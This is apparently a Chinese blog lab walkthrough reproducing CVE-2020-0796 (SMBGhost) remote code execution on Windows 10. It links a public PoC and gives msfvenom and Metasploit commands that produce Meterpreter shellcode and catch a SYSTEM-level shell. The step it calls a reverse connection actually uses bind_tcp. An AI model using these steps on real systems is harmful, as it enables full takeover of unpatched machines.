cve-2020-0796-永恒之黑

CVE-2020-0796-永恒之黑:RCE

文章目录

  • CVE-2020-0796-永恒之黑:RCE
    • 0x01 协议
    • 0x02 漏洞概述
    • 0x03 影响版本
    • 0x04 win10镜像,漏洞POC复现

0x01 协议

SMB(全称是Server Message Block)是一个协议名,它能被用于Web连接和客户端与服务器之间的信息沟通。

0x02 漏洞概述

该漏洞是由于smb协议在处理恶意的压缩包时出错造成的。它可以远程执行未经身份验证的系统上执行任意代码。该漏洞十分接近永恒之蓝,所以叫做永恒之黑,且该漏洞一旦获取权限就说最高权限,所以危害特大。

0x03 影响版本

  • 适用于32位系统的Windows 10版本1903
  • Windows 10 1903版(用于基于x64的系统)
  • Windows 10 1903版(用于基于ARM64的系统)
  • Windows Server 1903版(服务器核心安装)
  • 适用于32位系统的Windows 10版本1909
  • Windows 10版本1909(用于基于x64的系统)
  • Windows 10 1909版(用于基于ARM64的系统)
  • Windows Server版本1909(服务器核心安装)

0x04 win10镜像,漏洞POC复现

迅雷链接 大约4.4G左右 win10 1903 版本 VM安装时选择教育版本安装

ed2k://|file|cn_windows_10_business_editions_version_1903_x64_dvd_e001dd2c.iso|4815527936|47D4C57E638DF8BF74C59261E2CE702D|/

poc:

https://github.com/chompie1337/SMBGhost_RCE_PoC

poc使用环境为py3,网上有人说3.7复现poc不行,但是我实测3.7是没问题的。

启动msf,使用msf生成win64的shellcode,这里踩了个坑下面这条命令是正向链接,看的别人复现文档,但是实测正向链接不稳定,脚本也会报错,所以建议使用反向链接。所以这里提个醒。

正向链接:

msfvenom -p windows/x64/meterpreter/bind_tcp lport=3333 -f python

反向链接:

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b ‘\x00’ -i 1 -f python

然后buf替换成poc中的 exp.py 中的USER_PAYLOAD的值
cve-2020-0796-永恒之黑_第1张图片

cve-2020-0796-永恒之黑_第2张图片

cve-2020-0796-永恒之黑_第3张图片

替换后 使用msf监听靶机端口。

msf5 > use exploit/multi/handler

msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/bind_tcp

msf5 exploit(multi/handler) > set rhost 192.168.111.144 #靶机ip

msf5 exploit(multi/handler) > set lport 4444 #靶机端口

msf5 exploit(multi/handler) > run

cve-2020-0796-永恒之黑_第4张图片

已经监听上了,然后就是有几个问题,靶机防火墙必须关闭,流量才能过去。如果不关闭,流量并过不去。然后就是poc 非常不稳定。我 run 函数接受反弹shell 接受不了 使用exploit函数才能接受到,有点玄学。

还有就是靶机非常有可能蓝屏。实战使用很容易把业务打宕机,所以各位没用授权别做违法之事。

cve-2020-0796-永恒之黑_第5张图片
cve-2020-0796-永恒之黑_第6张图片

可以看到是最高权限。说明这台机子已经被完全拿下了。我运行了大概三次poc才成功

你可能感兴趣的:(cve-2020-0796-永恒之黑)